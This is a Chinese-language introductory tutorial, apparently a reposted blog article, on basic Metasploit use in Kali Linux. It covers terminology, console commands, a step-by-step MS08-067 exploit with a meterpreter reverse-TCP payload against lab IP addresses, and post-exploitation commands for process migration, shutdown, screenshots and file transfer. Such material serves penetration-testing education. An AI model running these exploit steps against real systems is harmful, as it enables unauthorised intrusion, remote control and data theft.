kali之metasploit基本使用
metasploit簡介
metasploit framework 簡稱 MSF.
是一個滲透攻擊框架,可擴展.腳本使用ruby語言. 腳本以.rb做結尾.
msf中集成了很多滲透攻擊的腳本(.rb)/模塊
下面介紹下在kali中簡單的使用方法.
MSF 的使用
命令行輸入 msfconsole 進入metasploit
MSF 的目錄
/usr/share/metasploit-framwork
專業術語
exploits
滲透攻擊
在MSF中的意思
滲透攻擊是指利用一個系統/應用/服務中的安全漏洞,所進行的攻擊行為
auxiliary 輔助模塊
payload 攻擊載荷
在MSF中的概念
我們期望目標系統在本次滲透攻擊之后的代碼
對于SQL注入來講 payload poc 是一個意思都是注入的意思
shellcode
在滲透攻擊時作為攻擊載荷所執行的代碼
module 模塊
一個模塊是指msf 中所使用的一段代碼組建,后綴名為.rb
listener
監聽器
等待網絡連接的組件
它們之間的關系
當我們向目標機發送一個shellcode時,是沒有交互的,所以我們用到了payload 來使目標與我們建立一個連接, 這個過程 也稱shell反彈 ,是可選的,不設置也可以完成攻擊 ,但通常情況下需要
常用命令
show 顯示所有的攻擊腳本
show auxiliary 顯示所有的輔助模塊以及他們的用途
show payloads 顯示所有的攻擊載荷
search 搜索某個模塊
use 使用模塊
use + 路徑進入模塊
info 顯示模塊信息
show options 顯示基本信息
show targets 顯示可用目標
show payloads 本目錄下可用的payload
set 設置
設置payload
set payload windows/meterpreter/reverse_tcp
meterpreter 下的tcp 反彈連接
search 文件名 搜索文件
LHOST 本機IP 地址 (tcp 反彈的目標)
攻擊流程
1. msfconsole #進入metasploit
2. use exploit/windows/smb/ms08_067_netapi #進入到ms08_067模塊
3. set payload windows/meterpreter/reverse_tcp #設置payload
4. set LHOST 192.168.109.129 #設置本機IP
5. set RHOST 192.168.109.130 #設置目標IP
6. set target 3 #設置使用的攻擊腳本
7. exploit #開始攻擊
攻擊成功后可以使用的常用命令
基本命令
background
將meterpter 隱藏的后臺
sessions
查看隱藏在后臺的會話
sessions -i [id]
quit
退出會話
shell
獲取目標系統控制臺shell(交互式)
系統命令
migrate
meterpreter 的遷移
從一個進程的內存空間移植到另一個進程的內存空間中去。
ps
獲取目標主機上正在運行的進程信息
getpid
獲取當前會話所在PID 的值
kill
結束進程
sysifo
顯示系統信息
shutdown
關機
屏幕截圖
screenshot
文件系統命令(meterpreter 命令)
ls
cd
cat
getpwd/pwd
upload 上傳文件
download 下載文件
edit 調用類似于vim 編輯器,對目標系統上的文件進行編輯
search 搜索文件
總結
以上是生活随笔為你收集整理的kali之metasploit基本使用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 国内网站安全测试6大步骤
- 下一篇: metasploit终端命令大全 MSF